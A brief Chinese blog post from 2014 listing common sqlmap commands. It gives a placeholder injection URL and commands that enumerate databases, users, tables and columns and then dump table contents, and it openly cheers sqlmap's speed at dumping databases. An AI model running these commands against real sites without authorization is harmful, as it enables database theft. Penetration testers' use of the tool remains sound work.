SQLMAP注入常用命令

时间:2014-04-13 07:55:00 +0800

SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。

 # > ./sqlmap.py -u “注入地址” -v 1 --dbs // 列举数据库
 
 # > ./sqlmap.py -u “注入地址” -v 1 --current-db // 当前数据库

 # >./sqlmap.py -u “注入地址” -v 1 --users // 列数据库用户

 # > ./sqlmap.py -u “注入地址” -v 1 --current-user // 当前用户

 # > ./sqlmap.py -u “注入地址” -v 1 --tables -D “数据库” // 列举数据库的表名

 # > ./sqlmap.py -u “注入地址” -v 1 --columns -T “表名” -D “数据库” // 获取表的列名

 # >./sqlmap.py -u “注入地址” -v 1 --dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列

已经开始拖库了,SQLMAP是非常人性化的,它会将获取的数据存储sqlmap/output/中

–delay 延时请求

×

Subscribe

The latest tutorials sent straight to your inbox.